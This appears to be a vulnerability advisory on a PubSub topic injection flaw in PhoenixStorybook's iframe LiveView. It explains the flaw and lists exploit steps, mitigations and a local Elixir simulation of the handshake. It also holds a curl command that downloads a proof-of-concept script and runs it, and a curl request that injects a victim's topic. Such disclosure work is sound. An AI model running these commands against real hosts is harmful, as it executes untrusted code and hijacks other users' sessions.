Intro (How the CVE works):
The vulnerability resides in `PhoenixStorybook.Story.ComponentIframeLive.handle_params/3` (lines 24‑30), the LiveView that renders storybook iframes. It reads a `topic` parameter straight from the URL query string without any validation. When the iframe LiveView mounts, it calls `Phoenix.PubSub.broadcast!` on the shared `PhoenixStorybook.PubSub` server, publishing the tuple `{:component_iframe_pid, self()}` to that user‑supplied topic.
Normally, a legitimate playground LiveView subscribes to a secret, session‑bound topic and waits for its iframe's pid so it can establish direct `send/2` communication for control messages (variation state, theme toggles, extra assigns). An attacker only needs to know or guess another user's playground topic. By opening a URL like `/storybook/iframe/<story>?topic=<victim_topic>`, the attacker's browser mounts its own iframe LiveView. The `handle_params` callback reads `params["topic"]`, now the victim's topic, and broadcasts the attacker's iframe pid onto it.
The victim's playground, still subscribed to its private topic, receives `{:component_iframe_pid, attacker_pid}`. Believing this is its own iframe, it starts sending control messages directly to the attacker's iframe process. There is no authentication, no session binding, and no ownership check on the topic: whichever process last announced itself on the topic becomes the playground's peer. The attack works across completely separate sessions (no shared cookies or credentials). The only precondition is that the attacker can reach the iframe route (unauthenticated by default) and knows or brute‑forces a target topic. This leads to a cross‑session information leak and potential message injection. The fix is to derive the topic server‑side from the LiveView session instead of the query string, or to nest the iframe under the playground so the broadcast handshake is no longer needed.
DailyCVE Form:
Platform: PhoenixStorybook
Version: ≤ 1.0.0
Vulnerability: PubSub topic injection
Severity: Critical
Date: 2024‑11‑15
Prediction: 2024‑12‑01
What Undercode Say (Analytics):
Clone and run the official PoC script:
curl -O https://example.com/cross_session_pubsub_injection.exs
elixir cross_session_pubsub_injection.exs
Manual reproduction: start a vulnerable Phoenix endpoint
mix phx.new demo --no-ecto
cd demo
Add {:phoenix_storybook, "1.0.0"} to the deps list in mix.exs, then run: mix deps.get (there is no standard `mix deps.add` task; the dependency is added by editing mix.exs)
In lib/demo_web/router.ex add `import PhoenixStorybook.Router` and `live_storybook("/storybook", backend_module: MyStorybook)`, where MyStorybook is a storybook backend module you define as described in the phoenix_storybook docs
iex -S mix phx.server
Attacker injects topic via curl (replace VICTIM_TOPIC):
curl "http://localhost:4000/storybook/iframe/demo?topic=VICTIM_TOPIC"
Note: `handle_params/3` also runs on the initial HTTP render, so this curl does fire the broadcast, but the announced pid belongs to the request process, which exits once the response completes. To actually receive the victim's control messages, open the same URL in a browser so the iframe LiveView connects over the websocket and stays alive.
Exploit:
- Attacker identifies or guesses a victim's playground topic (for example via a topic leak or a predictable naming pattern).
- Attacker opens `/storybook/iframe/<story>?topic=<victim_topic>` from any browser (a connected LiveView keeps the announced pid alive) or hits it with any HTTP client.
- The vulnerable iframe LiveView broadcasts its pid onto the victim's topic.
- Victim's playground receives the attacker's pid and sends all subsequent control messages (variation state, theme changes, custom assigns) to the attacker's process.
- Attacker captures and potentially responds to those messages, hijacking the victim's storybook interaction.
Protection:
- Upgrade to a patched version (when available).
- Apply a hotfix: override `ComponentIframeLive.handle_params/3` to ignore the query parameter and derive the topic from the signed session.
- Alternatively, configure the storybook to run only on internal networks or add authentication middleware to the `/storybook` route.
- Monitor logs for unexpected `?topic=` parameters in iframe requests.
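To make the handshake concrete, the following stand-alone Elixir script is an added example that models the mechanism from the Intro, the Exploit steps, and the session-derived fix from the Protection list. It is not PhoenixStorybook's own code: apart from the `{:component_iframe_pid, pid}` tuple and `Phoenix.PubSub.broadcast!`, every module, topic, and message name is hypothetical. It uses `Mix.install` to fetch `phoenix_pubsub` (network access is needed on the first run) and runs with `elixir pubsub_topic_injection.exs`.

```elixir
# Added example, not PhoenixStorybook's code. Models the playground <-> iframe
# PubSub handshake in two modes: :vulnerable (topic taken from ?topic=) and
# :hardened (topic taken from the server-side session). Names are hypothetical.
Mix.install([{:phoenix_pubsub, "~> 2.1"}])

{:ok, _sup} =
  Supervisor.start_link([{Phoenix.PubSub, name: Demo.PubSub}], strategy: :one_for_one)

defmodule Demo.Playground do
  # Models the playground LiveView: subscribes to its private topic and forwards
  # control messages to whichever pid last announced itself on that topic.
  def start(topic) do
    parent = self()

    pid =
      spawn_link(fn ->
        :ok = Phoenix.PubSub.subscribe(Demo.PubSub, topic)
        send(parent, {:subscribed, self()})
        loop(nil)
      end)

    # Block until the subscription exists so no broadcast is lost.
    receive do
      {:subscribed, ^pid} -> pid
    end
  end

  defp loop(iframe_pid) do
    receive do
      # No ownership check: the announced pid is trusted blindly (the bug).
      {:component_iframe_pid, pid} ->
        loop(pid)

      {:control, payload} when is_pid(iframe_pid) ->
        send(iframe_pid, {:set_variation, payload})
        loop(iframe_pid)
    end
  end
end

defmodule Demo.Iframe do
  # Models ComponentIframeLive. `session` stands for the signed, server-side
  # LiveView session; `params` is the attacker-controllable query string.
  def mount(mode, name, session, params, owner) do
    pid =
      spawn_link(fn ->
        topic =
          case mode do
            # Vulnerable: trusts ?topic=... from the URL.
            :vulnerable -> params["topic"]
            # Hardened: ignores params, uses the topic bound to this session.
            :hardened -> session["playground_topic"]
          end

        Phoenix.PubSub.broadcast!(Demo.PubSub, topic, {:component_iframe_pid, self()})
        send(owner, {:mounted, name})
        forward(name, owner)
      end)

    # Return only after the broadcast has happened, for deterministic ordering.
    receive do
      {:mounted, ^name} -> pid
    end
  end

  # Report every control message this iframe receives to the scenario driver.
  defp forward(name, owner) do
    receive do
      msg ->
        send(owner, {:delivered_to, name, msg})
        forward(name, owner)
    end
  end
end

defmodule Demo.Scenario do
  # Returns {which_iframe, message}: who ended up receiving the victim's control message.
  def run(mode) do
    victim_topic = "playground:" <> Base.url_encode64(:crypto.strong_rand_bytes(8))
    attacker_topic = "playground:" <> Base.url_encode64(:crypto.strong_rand_bytes(8))
    victim = Demo.Playground.start(victim_topic)

    # Victim's own iframe: session and query string both carry the victim topic.
    Demo.Iframe.mount(mode, :victim_iframe, %{"playground_topic" => victim_topic},
      %{"topic" => victim_topic}, self())

    # Attacker's iframe: a separate session, but ?topic= set to the guessed victim topic.
    Demo.Iframe.mount(mode, :attacker_iframe, %{"playground_topic" => attacker_topic},
      %{"topic" => victim_topic}, self())

    send(victim, {:control, %{variation: :dark_theme}})

    receive do
      {:delivered_to, who, msg} -> {who, msg}
    after
      1_000 -> :timeout
    end
  end
end

IO.inspect(Demo.Scenario.run(:vulnerable), label: "vulnerable")
IO.inspect(Demo.Scenario.run(:hardened), label: "hardened")
```

In `:vulnerable` mode the attacker's iframe announces itself on the victim's topic after the legitimate iframe did, so the playground's control message is delivered to `:attacker_iframe`; in `:hardened` mode the attacker's broadcast lands on its own session's topic, which nobody listens on, and the message reaches `:victim_iframe`. The hardened branch is the script's illustration of the "derive the topic from the signed session" hotfix; in a real deployment the playground should additionally reject an announced pid that does not match the session it created the topic for.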
Impact:
Cross‑session information disclosure of all storybook control messages (variation selections, theme toggles, developer‑defined extra assigns) sent from a victim’s playground to an attacker‑controlled iframe. An unauthenticated attacker who knows or guesses a playground’s topic can fully redirect the victim’s private communication, potentially leading to further injection attacks or exfiltration of sensitive state. No authentication bypass required – the iframe route is publicly reachable by design.
Sources:
Reported By: github.com